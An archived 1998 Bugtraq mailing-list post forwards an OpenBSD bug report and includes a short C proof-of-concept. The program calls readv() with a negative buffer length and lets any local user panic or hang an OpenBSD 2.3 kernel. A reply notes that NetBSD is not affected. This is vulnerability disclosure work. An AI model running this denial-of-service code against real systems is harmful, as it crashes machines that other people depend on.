Bugtraq mailing list archives
Re: Fwd: Any user can panic OpenBSD machine
From: thorpej () nas nasa gov (Jason Thorpe)
Date: Mon, 27 Jul 1998 11:21:46 -0700
On Mon, 27 Jul 1998 11:23:59 -0600 Michael Fuhr <mfuhr () DIMENSIONAL COM> wrote: To see if this is a generic *BSD bug, I checked a NetBSD-current (1.3F) machine. NetBSD 1.3F is NOT vulnerable; the readv() returns EINVAL. I performed the NetBSD test on both a PPro (i386) and Shark (arm32).
-----Forwarded message from jon () oaktree co uk----- Message-Id: <199807271126.MAA16724 () chalk oaktree net uk> Date: Mon, 27 Jul 1998 12:26:36 +0100 (BST) From: jon () oaktree co uk To: gnats () openbsd org X-Send-Pr-Version: 3.97 Subject: kernel/549: Any user can panic OpenBSD machine Sender: owner-bugs () openbsd orgNumber: 549 Category: kernel Synopsis: readv with -ve block size panics kernel Confidential: yes Severity: critical Priority: high Responsible: bugs State: open Class: sw-bug Submitter-Id: net Arrival-Date: Mon Jul 27 05:40:02 MDT 1998 Last-Modified: Originator: Jon Ribbens Organization:\/ Jon Ribbens / jon () oaktree co ukRelease: 2.3 Environment:System : OpenBSD 2.3 Architecture: OpenBSD.i386 Machine : i386Description:readv with one of the blocks having a -ve size panics the kernel. Oops.How-To-Repeat:#include <sys/types.h> #include <sys/uio.h> #include <unistd.h> int main(void) { struct iovec iov[1]; char buffer[1024]; iov[0].iov_base = buffer; iov[0].iov_len = -1; return readv(0, iov, 1); } run the above program, type a few characters, press return, observe either kernel panic or machine hang. panic message is "panic: ureadc: non-positive resid". Any user can do this.Fix:Dunno I'm afraid.Audit-Trail: Unformatted:-----End of forwarded message----- -- Michael Fuhr http://www.fuhr.net/~mfuhr/
Jason R. Thorpe thorpej () nas nasa gov NASA Ames Research Center Home: +1 408 866 1912 NAS: M/S 258-5 Work: +1 650 604 0935 Moffett Field, CA 94035 Pager: +1 650 940 5942
Current thread:
- Re: Fwd: Any user can panic OpenBSD machine Jason Thorpe (Jul 27)
- <Possible follow-ups>
- Re: Fwd: Any user can panic OpenBSD machine Michael Graff (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine Warner Losh (Jul 27)
- Re: Fwd: Any user can panic OpenBSD machine J.R. Valverde (Jul 28)
- Re: Fwd: Any user can panic OpenBSD machine Felix Schroeter (Jul 28)
- netscape mail overflow(another one) Paul Boehm (Jul 28)
- Re: netscape mail overflow(another one) Brett Glass (Jul 28)
- Re: netscape mail overflow(another one) pedward () WEBCOM COM (Jul 29)
- HP-UX Predictive & Netscape SSL Vulnerabilities Aleph One (Jul 29)
- Long attachment filename exploits: a procmail filter John D. Hardin (Jul 29)
- Re: Fwd: Any user can panic OpenBSD machine Todd C. Miller (Jul 27)